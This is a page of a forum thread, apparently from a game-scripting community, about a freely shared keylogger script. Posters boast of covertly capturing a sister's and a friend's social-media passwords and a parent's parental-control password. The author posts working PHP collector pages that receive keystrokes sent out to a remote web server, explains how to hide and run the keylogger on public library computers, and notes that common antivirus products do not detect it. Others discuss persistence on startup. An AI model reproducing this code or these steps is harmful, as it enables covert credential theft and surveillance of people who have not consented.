Page 2 of 8 FirstFirst 1234 ... LastLast
Results 26 to 50 of 189

Thread: Master KeyLogger version HEAVY and LITE!

  1. #26
    Join Date
    Dec 2006
    Posts
    5
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by Ron View Post
    My friend used this script to get his dad's firewall parental control password so he could unlock it.
    lawlz.. good idea i'll try it to xD

  2. #27
    Join Date
    Dec 2006
    Posts
    84
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    how do i use this... help?

  3. #28
    Join Date
    Dec 2006
    Location
    The Underground
    Posts
    134
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Lol, O man I love it...Many things I can pull with this

    Very nice script

  4. #29
    Join Date
    Dec 2006
    Posts
    84
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    nvm, i got this working

    so amazing that a real key logger program cost so much and this works fine and it's free!

  5. #30
    Join Date
    Feb 2007
    Posts
    10
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    can i just use it or can i put it on someone elses computer

  6. #31
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    hackerofall92, you can only run this on any computer with scar. You can't sit on your computer and run it on someone else's computer and get sent text. You can make a script to do that, but that wouldn't be a personal keylogger like this one. That would be more of a hacker keylogger.

    Glad you like the program Wayne and Wool

  7. #32
    Join Date
    Sep 2006
    Location
    West U.S.
    Posts
    2,172
    Mentioned
    0 Post(s)
    Quoted
    6 Post(s)

    Default

    good scripts

    but do you guys know how old this post is???

    They are sisters...
    Runescape Classic

  8. #33
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Who cares. If it's a good script. It should live forever since the author of the script is still updating it as we speak.

  9. #34
    Join Date
    Sep 2006
    Posts
    457
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    got a question. This may sound nooby but i don't know alot about key loggers; especaily ones used with scar.

    Do you run it on your computer or does it remotely install?

  10. #35
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    It only runs on your computer and only keylogs your computer.

  11. #36
    Join Date
    Mar 2007
    Posts
    15
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    first instruction : 1. Check to see if there are a total of #909 lines in this script.
    but ths script has 912 lines... (HEAVY version)

  12. #37
    Join Date
    Dec 2006
    Posts
    148
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Umm... this is kind of n00bish, but how THE HECK DO YOU UNHIDE SCAR??? Lol, pressing F12 5 times doesn't work, and Ctrl+Alt+S doesn't work either.

    EDIT: Nevermind, I got it to work.

  13. #38
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Dagger, you need to press F12 fast. Very quickly, press F12 five times.

    I made that so if your little brother or something knew how to kill the script, he would have a hard time doing so.

  14. #39
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Heh

    Nice script, mate.

    I turned it on before I let my sister and friend use my laptop, and I ended up grabbing my sister's facebook.com ID and pass, as well as my friend's myspace ID and pass

    Not gonna screw around with anything right now. I might as a joke later on.

    Edit: How do I have it send the information to a webpage? I'd like to be able to keep track of what they're doing, while they're doing it

  15. #40
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Oh right. I never setup the php page.

    Here is the MasterKeyLogger.php page where all the keystrokes should get sent to. So if your website is www.blah.com put your MasterKeyLogger.php page somewhere and set the website in the keylogger script to the location of that page. Then attach on ?k=

    Example:
    www.blah.com/MasterKeyLogger.php?k=

    Then set it so that it will send the keys to a website.

    MasterKeyLogger.php
    Code:
    <?php
    $k = $_GET['k'];
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Master Keylogger</title>
    </head>
    <body>
    <?
    if (!empty($k)) {
      echo "KeyStrokes contains text. Login to see it.";
    } else {
      echo "Login to see the keystrokes.";
    }
    ?>
    <form action="SeeKeyLogger.php?k=<?=$k;?>" method="post">
      <table>
        <tr>
          <td>Username: </td>
          <td><input type="text" name="user" /></td>
        </tr>
        <tr>
          <td>Password: </td>
          <td><input type="password" name="pass" /></td>
        </tr>
        <tr>
          <td colspan="2" align="center"><input type="submit" name="submit" value="Login" /></td>
        </tr>
      </table>
    </form>
    </body>
    </html>
    Create another file called SeeKeyLogger.php and put it in the same folder as MasterKeyLogger.php.

    Code:
    <?php
    $k = $_GET['k'];
    $user = $_POST['user'];
    $pass = $_POST['pass'];
    $real_user = 'RonTheCon'; // username - case sensitive
    $real_pass = '123'; // password - case sensitive
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Untitled Document</title>
    </head>
    
    <body>
    <?
    If($user == $real_user and $pass == $real_pass) {
    ?>
    Password was correct! Below is your keylogger details.<br /><br /><?=$k;?>
    <?
    } else {
    ?>
    Password was incorrect. Look through the PHP code to get the username or password if you forgot it. Otherwise, fuck off.
    <?
    }
    ?>
    </body>
    </html>
    Enjoy!

  16. #41
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Thanks, Ron!

    I just gotta figure out how to get that freehostia to work

    Thanks, mate. Maybe I'll set this up at the library

  17. #42
    Join Date
    Sep 2006
    Location
    New Jersey, USA
    Posts
    5,347
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    Quote Originally Posted by Jason2gs View Post
    Maybe I'll set this up at the library
    Except....It'll just stop working as soon as they restart...anyways how you gonna get scar on a library computer?

    Sweet script...sadly, I really have no use for it
    Interested in C# and Electrical Engineering? This might interest you.

  18. #43
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Download it.

    If they have some sort of firewall set up, crack through it.

    As for the restarting the computer- Just have the script run on startup

    I probably won't, though. I hardly ever go to the library.

  19. #44
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Firewalls, that I have checked, do not catch this.

    I checked with Norton, McAfee, and Kaspersky.

    Probably didn't catch it because of the entire setup. The whole setup is a text file that is being run by scar. And since this keylogger is made in such of an obscure way and also that the majority of people who key log others, do not use scar, that the firewalls don't have a signature to catch this.

    Oh and to install scar on a library computer. Don't download the .exe version. Just download the ZIP file from www.dylock.net/scar and then extract it in some strange folder no one accesses. Like... C:\Windows. Then you can access the files by opening up Paint or Microsoft Word or something by pressing Ctrl + O and then selecting All Files. This will show you all the files in the current folder. Navigate to the directory you put scar into, and then right click on scar.exe and instead of selecting "select", select Open.

    Viola! You just got scar to run on the computer! Now just download the script, and run it. Bring your friend over and force him to go to him email. Muahahaaha.

  20. #45
    Join Date
    Sep 2006
    Location
    New Jersey, USA
    Posts
    5,347
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    Quote Originally Posted by Jason2gs View Post
    Just have the script run on startup
    Is that even possible? maybe something like "scar.exe -r script.scar"
    Interested in C# and Electrical Engineering? This might interest you.

  21. #46
    Join Date
    Feb 2007
    Location
    Melbourne, Australia
    Posts
    891
    Mentioned
    0 Post(s)
    Quoted
    1 Post(s)

    Default

    Well, may be a bit confusing, so let me try to explain.

    So, my computer is a Windows XP (Simple enough...). And I have multiple user accounts on it. It works fine when you use it just on one user account.

    But when I was testing it t see whether it records the text on our "Guest" user account as well. When I pressed F12 5 times, entered the pass, SCAR pops up, but every single time, after 2 minutes of "Deleting Tags". SCAR just stops responding. So then you can't see the text that is recorded.

    A bit hard to explain...

    Oh, I was using the Heavy version, but I'll test the Lite version now.

    -Dunceiam

  22. #47
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Yeah the Heavy version has a few bugs. That's why I setup the Lite version.

    I will rewrite the Heavy version from scratch and it will be loads better since I have gained a lot of scar experience since then. Update will be coming soon. Thanks to the many that kept this script alive!

  23. #48
    Join Date
    Sep 2006
    Location
    West U.S.
    Posts
    2,172
    Mentioned
    0 Post(s)
    Quoted
    6 Post(s)

    Default

    hey ron!

    is there anyway you can make it so that the scar keylogger can start up all by itself when a computer is forced to be turned off or restarted???

    They are sisters...
    Runescape Classic

  24. #49
    Join Date
    Feb 2007
    Location
    Melbourne, Australia
    Posts
    891
    Mentioned
    0 Post(s)
    Quoted
    1 Post(s)

    Default

    Alright, tried the Lite Version this time. As with the Heavy version, it works perfectly when you're using only one user account. But then when you switch, write something, go back to your original account. And try to see what it recorded, SCAR just doesn't respond. Strange...

    Question, is it even supposed to record what people type on other "Users"?

    @legendary, Seems possible if you add it into your computers set-up. Although, I don't know much about that...

    -Dunceiam

  25. #50
    Join Date
    Apr 2006
    Location
    I live in NH
    Posts
    611
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Dunceiam, what do you mean by Users and Accounts?

    And Legendary, I don't think that's possible. Sorry.

Page 2 of 8 FirstFirst 1234 ... LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Get skills lite
    By jhildy in forum Research & Development Lounge
    Replies: 2
    Last Post: 10-11-2007, 01:28 AM
  2. KeyLogger Help
    By SKy Scripter in forum News and General
    Replies: 30
    Last Post: 10-05-2007, 11:34 AM
  3. Keylogger?
    By 3Garrett3 in forum News and General
    Replies: 11
    Last Post: 07-02-2007, 05:45 PM
  4. Plz Help i have a keylogger
    By pwnaz0r in forum News and General
    Replies: 8
    Last Post: 02-13-2007, 06:02 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •